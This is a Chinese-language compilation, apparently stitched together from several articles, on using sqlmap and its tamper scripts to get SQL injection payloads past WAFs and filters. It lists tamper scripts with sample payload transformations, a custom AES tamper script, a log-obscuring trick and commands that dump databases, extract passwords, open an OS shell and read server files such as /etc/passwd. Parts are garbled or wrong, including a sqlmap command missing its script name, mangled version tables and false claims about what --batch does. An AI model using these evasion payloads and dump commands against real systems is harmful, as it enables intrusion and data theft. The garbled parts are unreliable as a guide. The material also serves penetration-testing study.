sqlmap中tamper的套用编写

sqlmap 用法SQLmap 是一个基于Python 开发的自动化SQL 注入工具，可以自动扫描并发现网站SQL 注入漏洞，进而进行攻击，获取目标站点的敏感信息。

SQLmap 的用法如下：1. 下载SQLmap 并解压缩。

2. 打开命令行，进入到SQLmap 的目录下。

3. 执行以下命令：./sqlmap.py -u " dbs其中，`-u` 参数指定了目标网站的URL，`dbs` 参数是告诉SQLmap 爆破网站的数据库名称。

4. SQLmap 即会自动扫描目标站点，探测是否存在SQL 注入漏洞，并且提供一个菜单让用户选择要进行哪些操作。

下面是一些常用的SQLmap 命令：- `-u` 用来指定目标URL。

- `dbs` 用来指定要爆破的数据库名称。

- `current-db` 用来显示当前所处的数据库名称。

- `tables` 用来显示指定数据库中的所有表。

- `columns` 用来显示指定表中的所有列。

- `dump` 用来下载指定数据库中的所有数据。

- `-p` 用来指定要测试的参数。

- `technique` 用来指定使用的SQL 注入技术。

- `level` 用来指定SQL 注入攻击的强度级别。

- `user-agent` 用来指定HTTP User-Agent。

- `cookie` 用来指定HTTP Cookie。

- `tamper` 用来指定修改SQL 注入攻击载荷的方法。

以上命令只是SQLmap 的一部分，完整的命令列表可以查看SQLmap 的帮助文档。

在使用SQLmap 时，需要谨慎操作，以免不小心删除或修改了网站的数据。

sqlmap中tamper的简介⼀、SQLMap中tamper的简介1.tamper的作⽤使⽤SQLMap提供的tamper脚本，可在⼀定程度上避开应⽤程序的敏感字符过滤、绕过WAF规则的阻挡，继⽽进⾏渗透攻击。

部分防护系统的缩写：WAF：Web应⽤程序防⽕墙，Web Application FirewallIPS：⼊侵防御系统， Intrusion Prevention SystemIDS：⼊侵检测系统，Intrusion Detection System2.tamper⽤法--tamper=TAMPER 利⽤给定的脚本进⾏篡改注⼊数据。

其⽤法可举例说明：python sqlmap.py -u "http://.../?uname=admin&pwd=pass123"--level=5--risk=3 -p "uname" --tamper=xxx.py表⽰对指定的url地址，以所设置的level等级、risk等级，并采⽤选定的tamper篡改脚本对参数“uname”进⾏检测⼆、适配不同数据库类型的测试tamper当使⽤SQLMap篡改脚本执⾏渗透测试时，⾯对众多tamper可能会⽐较困惑，⼀开始不晓得该使⽤哪些脚本来测试。

有的脚本是适⽤于常⽤数据库的SQL注⼊攻击，有的适⽤于特定类型的数据库，还有的适⽤于某种数据库的特定版本范围。

为了相对明确的了解tamper的使⽤场景，把tamper的使⽤类型和范围作⼀下划分，具体如下：SQLMap⽬录中的所有tamper scripttamper = apostrophemask , apostrophenullencode , appendnullbyte , base64encode , between , bluecoat , chardoubleencode , charencode , charunicodeencode , concat2concatws , equaltolike , greatest , halfversionedmorekeywords , ifnull2ifisnull , modsecurityversioned , modsecurityzeroversioned , multiplespaces ,nonrecursivereplacement , percentage , randomcase , randomcomments , securesphere , space2comment , space2dash , space2hash , space2morehash ,space2mssqlblank , space2mssqlhash , space2mysqlblank , space2mysqldash , space2plus , space2randomblank , sp_password , unionalltounion , unmagicquotes , versionedkeywords , versionedmorekeywords通⽤的测试tampertamper = apostrophemask , apostrophenullencode , base64encode , between , chardoubleencode , charencode , charunicodeencode , equaltolike , greatest , ifnull2ifisnull , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , space2comment , space2plus , space2randomblank , unionalltounion ,unmagicquotesMSSQL(Microsoft SQL Servre)tamper = between , charencode , charunicodeencode , equaltolike , greatest , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , sp_password , space2comment , space2dash , space2mssqlblank , space2mysqldash , space2plus , space2randomblank , unionalltounion , unmagicquotesMySQLtamper = between , bluecoat , charencode , charunicodeencode , concat2concatws , equaltolike , greatest , halfversionedmorekeywords , ifnull2ifisnull ,modsecurityversioned , modsecurityzeroversioned , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , space2comment , space2hash , space2morehash , space2mysqldash , space2plus , space2randomblank , unionalltounion , unmagicquotes , versionedkeywords , versionedmorekeywords , xforwardedfor Oracletamper = between , charencode , equaltolike , greatest , multiplespaces , nonrecursivereplacement , randomcase , securesphere , space2comment , space2plus , space2randomblank , unionalltounion , unmagicquotes , xforwardedforMicrosoft Accesstamper = between , bluecoat , charencode , charunicodeencode , concat2concatws , equaltolike , greatest , halfversionedmorekeywords , ifnull2ifisnull ,modsecurityversioned , modsecurityzeroversioned , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , space2comment , space2hash , space2morehash , space2mysqldash , space2plus , space2randomblank , unionalltounion , unmagicquotes , versionedkeywords , versionedmorekeywords PostgreSQLtamper=between , charencode , charunicodeencode , equaltolike , greatest , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , space2comment , space2plus , space2randomblank , xforwardedfortamper适⽤的数据库类型&版本(*) 可能适⽤于所有版本(-) 不适⽤TAMPER MySQL MSSQL Oracle PostgreSQLapostrophemask****apostrophenullencode----appendnullbyte****base64encode4,5,5.5200510g-between 5.1---bluecoat****apostrophemask9.0.320002005-9.3charunicodeencode4,5.0 and 5.5200510g8.3,8.4,9.0charencode*---commalessmid*---concat2concatws****equaltolike****greatest< 5.1---halfversionedmorekeywords 5.0 and 5.5---ifnull2ifisnull**** informationschemacomment4,5.0,5.5200510g8.3,8.4,9.0 lowercase5---modsecurityversioned5---modsecurityzeroversioned**** multiplespaces**** nonrecursivereplacement**** overlongutf8 5.1.56,5.5.112000, 2005N/A9 percentage4, 5.0,5.5200510g8.3,8.4,9.0 randomcase**** randomcomments**** securesphere4,5.0,5.5200510g8.3,8.4,9.0 space2comment----space2dash 4.0,5.0---space2hash>= 5.1.13---space2morehash-2000, 2005--space2mssqlblank**--space2mssqlhash****space2plus4,5.0,5.5200510g8.3,8.4,9.0 space2randomblank-*--sp_password**** symboliclogical**** unionalltounion**** unmagicquotes4, 5.0,5.5200510g8.3,8.4,9.0 uppercase**** varnish*---versionedkeywords>=5.1.13---versionedmorekeywords**** xforwardedfor****三、SQLMap中tamper篡改脚本的功能解释apostrophemask.py功能：对引号进⾏utf-8格式编码(%EF%BC%87)平台：All举例：1 AND '1'='1 ==> 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871 apostrophenullencode.py功能：⽤⾮法的双unicode字符(%00%27)替换引号字符平台：All举例：1 AND '1'='1 ==> 1 AND %00%271%00%27=%00%271 appendnullbyte.py功能：在有效载荷结束位置加载零字节字符编码平台：Microsoft Access举例：1 AND 1=1 ==> 1 AND 1=1%00base64encode.py功能：⽤base64格式进⾏编码平台：All举例：1' AND SLEEP(5)# ==> MScgQU5EIFNMRUVQKDUpIw==between.py功能：⽤between替换⼤于号（>）平台：Mssql2005、MySQL 4/5.0/5.5、Oracle 10g、PostgreSQL 8.3/8.4/9.0举例：1 AND A > B -- ==> 1 AND A NOT BETWEEN 0 AND B --1 AND A = B -- ==> 1 AND A BETWEEN B AND B --bluecoat.py功能：对SQL语句替换空格字符为(%09)，并替换"="--->"LIKE"平台：MySQL 5.1, SGOS举例：SELECT username FROM users WHERE id = 1 ==> SELECT%09username FROM%09users WHERE%09id LIKE 1apostrophemask.py功能：⽤utf-8格式编码引号(如：%EF%BC%87)平台：All举例：1 AND '1'='1 ==> 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871charunicodeencode.py功能：对字符串进⾏Unicode格式转义编码平台：Mssql 2000,2005、MySQL 5.1.56、PostgreSQL 9.0.3 ASP/举例：SELECT FIELD%20FROM TABLE ==>%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045 charencode.py功能：采⽤url格式编码1次平台：Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0举例：SELECT FIELD FROM%20TABLE ==> %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45chardoubleencode.py功能：采⽤url格式编码2次平台：All举例：SELECT FIELD FROM%20TABLE ==>%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545commalessmid.py功能：将payload中的逗号⽤ from和for代替，⽤于过滤了逗号并且是3个参数的情况平台：MySQL 5.0, 5.5举例：MID(VERSION(), 1, 1) ==> MID(VERSION() FROM 1 FOR 1)concat2concatws.py功能：CONCAT() ==> CONCAT_WS()，⽤于过滤了CONCAT()函数的情况平台： MySQL 5.0举例：CONCAT(1,2) ==> CONCAT_WS(MID(CHAR(0),0,0),1,2)equaltolike.py功能：= ==> LIKE，⽤于过滤了等号"="的情况平台：Mssql 2005、MySQL 4, 5.0 and 5.5举例：SELECT * FROM users WHERE id=1 ==> SELECT * FROM users WHERE id LIKE 1greatest.py功能：> ==> GREATEST平台：MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0举例：1 AND A > B ==> 1 AND GREATEST(A, B+1)=Aa和b+1⽐较，取两者中的最⼤值为a；则a >= b+1，亦即a > bhalfversionedmorekeywords.py功能：空格 ==> /*!0 （在关键字前添加注释）平台：MySQL 4.0.18, 5.0.22（Mysql < 5.1）举例：union ==> /*!0unionifnull2ifisnull.py功能：IFNULL(A, B) ==> IF(ISNULL(A), B, A)平台：MySQL 5.0 and 5.5举例：IFNULL(1, 2) ==> IF(ISNULL(1),2,1)informationschemacomment.py功能：在 information_schema 后⾯加上 /**/ ，⽤于绕过对 information_schema 的情况retVal = re.sub(r"(?i)(information_schema).", "g<1>/**/.", payload)平台：All举例：select table_name from information_schema.tables ==> select table_name from information_schema/**/.tableslowercase.py功能：将 payload ⾥的⼤写转为⼩写平台：Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0举例：SELECT table_name FROM INFORMATION_SCHEMA.TABLES ==> select table_name from information_schema.tables modsecurityversioned.py功能：⽤注释来包围完整的查询语句，⽤于绕过 ModSecurity 开源 waf平台：MySQL 5.0举例：1 AND 2>1-- ==> 1 /*!30874AND 2>1*/--modsecurityzeroversioned.py功能：⽤注释来包围完整的查询语句，⽤于绕过 waf ，和上⾯类似平台：Mysql举例：1 and 2>1--+ ==> 1 /!00000and 2>1/--+multiplespaces.py功能：围绕SQL关键字添加多个空格平台：All举例：1 UNION SELECT foobar ==> 1 UNION SELECT foobarnonrecursivereplacement.py功能：关键字双写，可⽤于关键字过滤平台：All举例：1 UNION SELECT 2-- ==> 1 UNIONUNION SELESELECTCT 2--overlongutf8.py功能：转换给定的payload当中的所有字符平台：All举例：SELECT FIELD FROM TABLE WHERE 2>1 ==> SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1 percentage.py功能：⽤百分号来绕过关键字过滤，在关键字的每个字母前⾯都加⼀个(%)平台：Mssql 2000, 2005、MySQL 5.1.56, 5.5.11、PostgreSQL 9.0举例：SELECT FIELD FROM TABLE ==> %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%Erandomcase.py功能：将 payload 随机⼤⼩写平台：Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0举例：INSERT ==> InseRtrandomcomments.py功能：在 payload 的关键字中间随机插⼊注释符 /**/ ，可⽤于绕过关键字过滤平台：Mysql举例：INSERT ==> I / ** / N / ** / SERTsecuresphere.py功能：在payload后追加特殊构造的字符串平台：All举例：1 AND 1=1 ==> 1 AND 1=1 and '0having'='0having'space2comment.py功能：⽤注释符 // 代替空格，⽤于空格的绕过平台：Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0举例：SELECT id FROM users ==> SELECT//id//FROM//usersspace2dash.py功能：⽤[注释符(--)+⼀个随机字符串+⼀个换⾏符]替换控制符平台：MSSQL、 SQLite举例：union select 1,2--+ ==> union--HSHjsJh%0Aselect--HhjHSJ%0A1,2--+space2hash.py功能：⽤[注释符(#)+⼀个随机字符串+⼀个换⾏符]替换控制符平台：Mysql举例：union select 1,2--+ ==> union%23HSHjsJh%0Aselect%23HhjHSJ%0A1,2--+space2morehash.py功能：⽤多个[注释符(#)+⼀个随机字符串+⼀个换⾏符]替换控制符平台：MySQL >= 5.1.13举例：union select 1,2--+ ==> union %23 HSHjsJh %0A select %23 HhjHSJ %0A%23 HJHJhj %0A 1,2--+ space2mssqlblank.py功能：⽤随机的空⽩符替换payload中的空格blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')平台：Mssql 2000,2005举例：SELECT id FROM users ==> SELECT%0Eid%0DFROM%07usersspace2mssqlhash.py功能：⽤[字符# +⼀个换⾏符]替换payload中的空格平台：MSSQL、MySQL举例：union select 1,2--+ ==> union%23%0Aselect%23%0A1,2--+space2plus.py功能：⽤加号(+)替换空格平台：All举例：SELECT id FROM users ==> SELECT+id+FROM+usersspace2randomblank.py功能：⽤随机的空⽩符替换payload中的空格平台：Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0举例：SELECT id FROM users ==> SELECT%0Did%0DFROM%0Auserssp_password.py功能：在payload语句后添加 sp_password ，⽤于迷惑数据库⽇志（Space ==> sp_password）平台：Mssql举例：1 AND 9227=9227-- ==> 1 AND 9227=9227-- sp_passwordsymboliclogical.py功能：⽤ && 替换 and ，⽤ || 替换 or ，⽤于这些关键字被过滤的情况平台：All举例：1 and 1=1 ==> 1 %26%26 1=11 or 1=1 ==> 1 %7c%7c 1=1unionalltounion.py功能：⽤ union select 替换union all select平台：All举例：union all select 1,2--+ ==> union select 1,2--+unmagicquotes.py功能：⽤宽字符绕过 GPC addslashes平台：All举例：1' and 1=1 ==> 1%df%27 and 1=1--uppercase.py功能：将payload中的⼩写字母转为⼤写格式平台：Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0举例：insert ==> INSERTvarnish.py功能：添加⼀个HTTP头“ X-originating-IP ”来绕过WAF平台：headers = kwargs.get("headers", {})headers["X-originating-IP"] = "127.0.0.1"return payload举例：Allversionedkeywords.py功能：对⾮函数的关键字进⾏注释平台：MySQL 4.0.18, 5.1.56, 5.5.11举例：1 union select user() ==> 1/!UNION//!SELECT/user()versionedmorekeywords.py功能：对每个关键字进⾏注释处理平台：MySQL 5.1.56, 5.5.11举例：1 union select user() ==> 1/!UNION//!SELECT/user()xforwardedfor.py功能：添加⼀个伪造的HTTP头“ X-Forwarded-For ”来绕过WAF平台：All举例：headers = kwargs.get("headers", {})headers["X-Forwarded-For"] = randomIP()return payload。

sqlmap tamper aes编码在SQL Injection测试中，SQLMap是一个常用的工具，它可以自动化地检测和利用SQL注入漏洞。

在使用SQLMap时，可以通过使用tamper脚本来对payload进行变形，以绕过WAF或其他安全机制的检测。

关于AES编码的tamper脚本，你可以创建一个Python脚本来实现。

以下是一个示例的AES编码tamper脚本：```pythonimport base64from Crypto.Cipher import AESclass AESTamper(object):def __init__(self, key):self.key = key # AES加密密钥def encode(self, payload):cipher = AES.new(self.key, AES.MODE_ECB)padded_payload = self._pad(payload)encrypted_payload = cipher.encrypt(padded_payload)encoded_payload =base64.b64encode(encrypted_payload).decode('utf-8')return encoded_payloaddef _pad(self, s):block_size = AES.block_sizepadding_length = block_size - (len(s) % block_size)padded_s = s + padding_length * chr(padding_length)return padded_skey = b'Your_AES_key' # AES加密密钥tamper = AESTamper(key)payload = "SELECT * FROM users WHERE id=1"encoded_payload = tamper.encode(payload)print(encoded_payload)```在上面的脚本中，我们使用了`pycryptodome`库来实现AES编码功能。

sqlmap使⽤⼿册sqlmap使⽤⼿册输⼊“python sqlmap.py --version”检查sqlmap是否安装成功输⼊“python sqlmap.py -hh”， “-hh”参数⽤于查看sqlmap的使⽤说明输⼊“python sqlmap.py -u "http://192.168.117.135/xxx.php?xxx_id=1"”，其中“-u”参数⽤于指定注⼊点的URL。

输⼊“python sqlmap.py –u "http://192.168.117.135/ry.php?ry_id=1" --dbs”，其中参数“--dbs”⽤于列举数据库。

输⼊“python sqlmap.py -u "http://192.168.117.135/ry.php?ry_id=1" -D jnng --tables”，其中参数“-D”⽤于指定数据库名称，“--tables”参数⽤于列举表。

输⼊“python sqlmap.py -u "http://192.168.117.135/ry.php?ry_id=1" -D jnng -T root --columns”，其中参数“-T”⽤于指定表名称，“--columns”参数⽤于指定列出表中字段。

输⼊“python sqlmap.py -u "http://192.168.117.135/ry.php?ry_id=1" -D jnng -T root -C root_id,root_name,root_pass --dump”，其中参数“-C”⽤于指定字段名称，参数“—dump”⽤于导出数据。

--os-shell--file-read "/user/www/flag.php官⽅命令sqlmap -r http.txt #http.txt是我们抓取的http的请求包sqlmap -r http.txt -p username #指定参数，当有多个参数⽽你⼜知道username参数存在SQL漏洞，你就可以使⽤-p指定参数进⾏探测sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" #探测该url是否存在漏洞sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --cookie="抓取的cookie" #当该⽹站需要登录时，探测该url是否存在漏洞sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --data="uname=admin&passwd=admin&submit=Submit" #抓取其post提交的数据填⼊sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --users #查看数据库的所有⽤户sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --passwords #查看数据库⽤户名的密码sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-user #查看数据库当前的⽤户sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --is-dba #判断当前⽤户是否有管理员权限sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --roles #列出数据库所有管理员⾓⾊，仅适⽤于oracle数据库的时候sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --dbs #爆出所有的数据库sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --tables #爆出所有的数据表sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --columns #爆出数据库中所有的列sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-db #查看当前的数据库sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --tables #爆出数据库security中的所有的表sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --columns #爆出security数据库中users表中的所有的列sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username --dump #爆出数据库security中的users表中的username列中的所有数据sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --dump-all #爆出数据库security中的users表中的所有数据sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --dump-all #爆出数据库security中的所有数据sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --dump-all #爆出该数据库中的所有数据sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --tamper=space2comment.py #指定脚本进⾏过滤，⽤/**/代替空格sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --level=5 --risk=3 #探测等级5，平台危险等级3，都是最⾼级别。

sqlmaptamper脚本备忘录与tamper脚本编写查看sqlmap全部脚本$ python sqlmap.py --list-tampers使⽤⽅法--tamper=TAMPER2019.9更新后翻译* apostrophemask.py-⽤其UTF-8全⾓字符替换撇号（'）（例如'->％EF％BC％87）* apostrophenullencode.py-⽤⾮法的双unicode替换撇号（'）（例如'->％00％27）* appendnullbyte.py-在有效载荷的末尾附加（访问）NULL字节字符（％00）* base64encode.py-Base64对给定有效载荷中的所有字符进⾏编码* between.py- 替换较⼤⽐运算符（'>'）带有'NOT BETWEEN 0 AND＃'，等于运算符（'='）与'BETWEEN＃AND＃'* bluecoat.py-⽤有效的随机空⽩字符替换SQL语句后的空格字符。

然后⽤运算符LIKE替换字符'='* chardoubleencode.py-双重URL编码给定有效负载中的所有字符（未处理已编码）（例如SELECT->％2553％2545％254C％2545％2543％2554）* charencode.py-URL编码中的所有字符给定的有效载荷（不处理已经编码的）（例如SELECT->％53％45％4C％45％43％54）* charunicodeencode.py-Unicode-URL编码给定的有效载荷中的所有字符（不处理已经编码的）（例如SELECT->％u0053％u0045％u004C％u0045％u0043％u0054）* charunicodeescape.py-Unicode转义给定有效负载中的未编码字符（未处理已编码的字符）（例如SELECT-> \ u0053 \ u0045 \ u004C \ u0045 \ u0043 \ u0054）* commalesslimit.py-⽤'LIMIT N OFFSET M'替换（MySQL）实例，例如'LIMIT M，N'* commalessmid.py-⽤'MID（A FROM B FOR C）'替换（MySQL）实例，例如'MID（A，B，C）'* commentbeforeparentheses.py-在括号前加（内联）注释（例如（（-> / ** /（）* concat2concatws.py-⽤'CONCAT_WS（MID（CHAR（0），0，0），A，B）' 等价物（相当于）替换（MySQL）实例，例如'CONCAT（A，B）' 。

sqlmap tamper用法
sqlmaptamper用法是一种用来绕过特定WAF保护的技术。

它通过改变SQL语句的结构，来绕过WAF的检查。

sqlmap tamper是一种非常强大的工具，可以用来检测和利用SQL注入漏洞。

下面是一些使用sqlmap tamper的技巧：
1. 通过--tamper参数来指定tamper脚本，如：
--tamper=space2comment
2. 使用多个tamper脚本组合来绕过WAF的多个保护层，如：--tamper=space2comment,apostrophemask,randomcase
3. 自定义tamper脚本，使用Python编写，可以绕过特定的WAF 保护。

4. 将tamper脚本打包成zip文件，然后使用
--tamper=zipfile://path/to/zipfile来指定。

5. 使用tamper脚本的同时，可以使用其他参数，如--level和--risk来增加漏洞检测的准确性和速度。

总之，sqlmap tamper是一种非常有用的技术，可以帮助发现和利用SQL注入漏洞。

但是，需要注意的是，使用tamper脚本也可能绕过合法的WAF保护，从而导致系统被攻击。

因此，在使用tamper 脚本时，需要谨慎和审慎。

- 1 -。

sqlmap绕waf参数SQLMap是一款自动化的SQL注入工具，但在遇到Web应用程序防火墙（Web Application Firewall，WAF）时，可能会遇到一些挑战。

WAF是一种网络安全设备，用于监控、过滤和阻止潜在的恶意网络流量，包括SQL注入攻击。

尽管WAF的目的是保护Web应用程序免受SQL注入等攻击的侵害，但有时候我们需要通过绕过WAF来进行SQL注入测试。

本文将介绍一些绕过WAF的常见技术和策略。

1.伪造User-Agent：WAF通常会检测到常见的SQL注入工具的User-Agent，例如SQLMap的User-Agent。

通过修改User-Agent，可以欺骗WAF，伪装成普通的浏览器请求。

可以使用SQLMap的`--random-agent`选项来随机生成各种User-Agent。

2.增加延时：WAF有时会检测到异常的查询延迟，并将其识别为可能的攻击。

通过增加查询的延时，可以使注入攻击看起来更像是正常的查询操作。

SQLMap的`--delay`选项允许我们指定查询延迟的时间。

3.分割查询：WAF通常会检测到并阻止包含多个查询语句的请求。

SQLMap提供了`--batch`选项，可以将查询分割成多个单独的请求，绕过WAF的检测。

4.编码绕过：WAF可能会对特殊字符进行检测和过滤。

可以使用URL编码、十六进制编码或Unicode编码等方式对注入载荷进行编码，以绕过WAF的检测。

SQLMap的`--tamper`选项提供了多种编码和混淆技术。

5.使用短语绕过：WAF可能会检测常见的SQL关键词和注入语句。

可以使用SQL注入短语替代常见的关键词，如使用`1=1`替代`or 1=1`，以绕过WAF的检测。

6.直接绕过：有时候可以通过绕过WAF的姿势来注入SQL语句。

常见的绕过技术包括使用注释符绕过，如将`--`作为SQL注释符来注释掉WAF检测到的关键词。

7.错误绕过：利用WAF返回的错误信息可以帮助我们绕过阻止注入攻击的规则。

sqlmap master工具新手使用方法SQLMap Master工具新手使用方法SQLMap Master是一款广泛使用的SQL注入检测和利用工具。

对于新手来说，熟悉其使用方法是非常重要的。

本文将详细介绍SQLMap Master的各种使用方法。

安装SQLMap Master1.首先，从SQLMap官方GitHub仓库下载SQLMap Master的源代码。

2.解压下载的压缩包到任意目录。

3.进入解压后的目录，在终端中输入python，如果没有报错提示，则表示安装成功。

基本使用方法1.打开终端，进入SQLMap Master的安装目录。

2.输入命令python -u [目标URL]，其中[目标URL]是要进行注入检测的网站URL。

3.SQLMap Master将自动进行注入检测，并显示检测结果。

SQLMap Master有许多参数选项，可以根据具体需求进行定制化配置。

基本选项•-u [URL]：指定目标URL。

•--data [DATA]：指定POST请求的数据。

•--cookie [COOKIE]：指定Cookie。

•--level [LEVEL]：指定注入检测的等级。

•--threads [THREADS]：指定使用的线程数。

技巧性选项•--dbms [DBMS]：指定目标数据库类型。

•--os [OS]：指定目标操作系统类型。

•--tamper [TAMPER]：指定注入检测时使用的特殊技巧。

高级功能SQLMap Master还提供了一些高级功能，可以进一步探测和利用注入漏洞。

数据库探测•--dbs：列举目标数据库的所有数据库。

•--dump：获取目标数据库的数据。

文件系统操作•--file-read [FILE]：读取目标服务器上指定文件的内容。

•--file-write [FILE]：在目标服务器上写入指定文件。

使用示例以下是SQLMap Master常用功能的使用示例。

基本检测python -u数据库探测python -u --dbs数据获取python -u -D dbname --dump文件系统操作python -u --file-read "/etc/passwd"总结SQLMap Master是一款功能强大的SQL注入检测和利用工具。

SQLMAP之tamper详解sqlmap 是一款注入神器广为人知，里面的 tamper 常常用来绕过WAF ，很实用的模块，但是却常常被新手忽略（比如我），今天就整理总结一下 tamper 的用法以及 tamper 的编写PS：工具既然叫做工具，就是用来辅助上单的，呸辅助我们完成某些任务的，仅仅适用于当进行某些重复的繁琐工作或是偶尔懒癌发作时，不能过度依赖ALL 表示所有数据库都适用，具体指出哪种数据库就表名只只适用于某些数据。

使用方法：sqlmap.py XXXXX -tamper "模块名"各个 tamper 的作用下面针对 sqlmap 自带的 tamper 做一下简单的解释。

apostrophemask.py:return payload.replace(''', "%EF%BC%87") if payload else payload将单引号 url 编码，用于过滤了单引号的情况。

1' AND '1'='1 to 1%EF%BC%87 AND %EF%BC%871%EF%BC%87=%EF%BC%871适用数据库：ALLapostrophenullencode.py:return payload.replace(''', "%00%27") if payload else payload 将单引号替换为宽字节 unicode 字符，用于过滤了单引号的情况1' AND '1'='1 to 1�' AND �'1�'=�'1适用数据库：ALLappendnullbyte.py:return "%s%%00" % payload if payload else payload在你构造的payload后面加一个空字符1' AND '1'='1 to 1' AND '1'='1[]适用数据库：Accessbase64encode.py:returnbase64.b64encode(payload.encode(UNICODE_ENCODING)) if payload else payload这个看模块名也知道是 base64 编码1' AND '1'='1 to MScgQU5EICcxJz0nMQ==适用数据库：ALLbetween.py:这个代码有点长，就不贴代码了，可以自己去查看：C:\Python\SQLMap\tamper\between.py将大于符号和等号用 between 语句替换，用于过滤了大于符号和等号的情况1 AND A > B to 1 AND A NOT BETWEEN 0 AND B1 AND A = B to 1 AND A BETWEEN B AND B适用数据库：ALLbluecoat.py:用随机的空白字符代替空格，并且将等号替换为like ，用于过滤了空格和等号的情况union select from users where id = 1 to union%09select from%09users where id like 1适用数据库：MySQL 5.1, SGOSchardoubleencode.py:用 url 编码两次你的 payloadselect * from users to %2573%2565%256c%2565%2563%2574%2520%252a%2520 %2566%2572%256f%256d%2520%2575%2573%2565%2572 适用数据库：ALLcharencode.py:用 url 编码一次你的 payloadselect * from users to %73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20% 75%73%65%72适用数据库：ALLcharunicodeencode.py：用 unicode 编码 payload ，只编码非编码字符select * from users to u0073u0065u006cu0065u0063u0074u0020u002au0020u0066u0 072u006fu006du0020u0075u0073u0065u0072u0073 适用数据库：ALL，但是需要 asp 和 环境commalesslimit.py：将 payload 中的逗号用 offset 代替，用于过滤了逗号并且是两个参数的情况limit 2,1 to limit 1 offset 2适用数据库：MySQLcommalessmid.py：将 payload 中的逗号用 from for 代替，用于过滤了逗号并且是三参数的情况mid(version(), 1, 1) to mid(version() from 1 for 1)适用数据库：MySQLcommentbeforeparentheses.py：retVal = re.sub(r"b(w+)(", "g<1>/**/(", retVal)在某个单词后的第一个括号前面加入/**/ ，用于过滤了函数的情况union select group_concat(table_name) to union select group_concat/**/(table_name)适用数据库：ALLconcat2concatws.py：payload = payload.replace("CONCAT(", "CONCAT_WS(MID(CHAR(0),0,0),")用于过滤了 concat 函数的情况concat(1,2) to concat_ws(mid(char(0), 0, 0), 1, 2)适用数据库：MySQLequaltolike.py：retVal = re.sub(r"s=s", " LIKE ", retVal)将等号用 like 代替，用于过滤了等号的情况select from users where id=1 to select from users where id like 1适用数据库：ALLescapequotes.py：return payload.replace("'", "'").replace('"', '"')将单引号转换成 \' ，双引号转换成 \" ，用于过滤了单引号或双引号的情况1' and 1=1--+ to 1\' and 1=1--+适用数据库：ALLgreatest.py：用 greatest 代替大于符号，用于大于符号被过滤了的情况1 and a>b to 1 and greatest(a,b+1)=aALLhalfversionedmorekeywords.py：在关键字前添加注释，用于过滤了关键字的情况union select 1,2 to /!0union/!0select 1,2适用数据库：MySQL < 5.1htmlencode.py：return re.sub(r"1", lambda match: "&#%d;" % ord(match.group(0)), payload) if payload else payload 从名字就知道是将 payload 进行 html 编码1' and 1=1--+ to 1' and 1=1--+适用数据库：ALLifnull2ifisnull.py：将 ifnull() 函数转为 if(isnull()) 函数，用于过滤了 ifnull 函数的情况ifnull(1, 2) to if(isnull(1), 2, 1)适用数据库：MySqlinformationschemacomment.py：retVal = re.sub(r"(?i)(information_schema).", "g<1>/**/.", payload)在information_schema 后面加上/**/ ，用于绕过对information_schema 的情况select table_name from information_schema.tables to select table_name from information_schema/**/.tables适用数据库：ALLlowercase.py：将 payload 里的大写转为小写UNION SELECT to union select适用数据库：ALLmodsecurityversioned.py：用注释来包围完整的查询语句，用于绕过 ModSecurity 开源 waf1 and 2>1--+ to 1 /!30874and 2>1/--+适用数据库：MySQLmodsecurityzeroversioned.py：用注释来包围完整的查询语句，用于绕过 waf ，和上面类似1 and 2>1--+ to 1 /!00000and 2>1/--+适用数据库：MySQLmultiplespaces.py：在关键字周围添加多个空格union select 1,2--+ to union select 